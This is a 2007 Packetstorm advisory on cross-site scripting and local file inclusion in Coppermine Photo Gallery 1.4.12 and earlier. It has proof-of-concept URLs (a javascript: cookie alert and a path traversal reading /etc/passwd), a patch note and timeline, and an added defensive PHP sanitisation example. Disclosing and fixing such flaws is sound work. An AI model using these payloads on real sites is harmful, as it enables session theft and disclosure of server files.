coppermine1412-xss.txt

2007-09-18T00:00:00
ID PACKETSTORM:59387
Type packetstorm
Reporter L4teral
Modified 2007-09-18T00:00:00

Description

============================================================  
Coppermine <= 1.4.12 Cross Site Scripting and Local File Inclusion  
============================================================  
  
Author: L4teral <l4teral [4t] gmail com>  
Impact: Cross Site Scripting/Local File Inclusion  
Status: patch available  
  
  
------------------------------  
Affected software description:  
------------------------------  
  
Application: Coppermine Photo Gallery  
Version: <= 1.4.12  
Vendor: http://coppermine-gallery.net  
  
Description:  
Coppermine is a multi-purpose, fully-featured and integrated  
web picture gallery script written in PHP, using GD or ImageMagick  
as the image library, with a MySQL backend.  
  
  
----------------  
Vulnerabilities:  
----------------  
  
The script mode.php does not properly sanitize the "referer" parameter.  
  
The script viewlog.php does not properly sanitize the "log" parameter.  
  
  
------------  
Poc/Exploit:  
------------  
  
http://localhost/cpg/mode.php?admin_mode=1&referer=javascript:alert(document.cookie)  
  
http://localhost/cpg/viewlog.php?log=../../../../../../../../../etc/passwd%00  
(should require admin privileges)  
  
  
---------  
Solution:  
---------  
  
Update to 1.4.13 or above.  
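For readers who maintain a similar PHP application, the following is an added example (not Coppermine's code and not part of the original advisory) of how the two parameters named above can be handled defensively: the redirect target is restricted to a relative in-gallery path, and the log name is resolved only through an allow-list. The function names and the allow-list entries are hypothetical.

```php
<?php
// Added example, not Coppermine's code; function names and allow-list are hypothetical.

// Return a redirect target that is safe to emit in a Location header or an
// href. Only a relative path inside the gallery is accepted; a scheme
// (javascript:, data:, http:), a host (//evil.example), a backslash or any
// control character falls back to the gallery index.
function safe_referer(?string $referer, string $fallback = 'index.php'): string
{
    if ($referer === null || $referer === '') {
        return $fallback;
    }
    // CR/LF would allow header injection; NUL truncates in C-backed calls.
    if (preg_match('/[\x00-\x1F\x7F]/', $referer)) {
        return $fallback;
    }
    $parts = parse_url($referer);
    if ($parts === false || isset($parts['scheme']) || isset($parts['host'])) {
        return $fallback;
    }
    if (strpos($referer, '//') === 0 || strpos($referer, '\\') !== false) {
        return $fallback;
    }
    return $referer; // still HTML-escape it at the point of output
}

// Map the user-supplied "log" parameter to a file inside the log directory.
// An explicit allow-list defeats "../" traversal, NUL-byte truncation and
// absolute paths without having to reason about each trick separately.
function safe_log_path(string $log, string $logDir): ?string
{
    static $allowed = ['log_ecards.txt', 'log_uploads.txt']; // hypothetical names
    if (!in_array($log, $allowed, true)) {
        return null;
    }
    $base = realpath($logDir);
    $path = realpath($logDir . DIRECTORY_SEPARATOR . $log);
    // Belt and braces: the resolved file must still live under $logDir.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Exercise both functions with the advisory's own payloads.
var_dump(safe_referer('javascript:alert(document.cookie)'));
var_dump(safe_referer('thumbnails.php?album=1'));
var_dump(safe_log_path("../../../../../../../../../etc/passwd\0", __DIR__ . '/logs'));
```

Both payloads from the PoC section are rejected by the first check they meet (the scheme check and the allow-list respectively), so the later path checks only matter for inputs that already look legitimate.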
  
  
---------  
Timeline:  
---------  
  
03.09.2007 - vendor informed  
14.09.2007 - patch released by vendor  
17.09.2007 - public disclosure  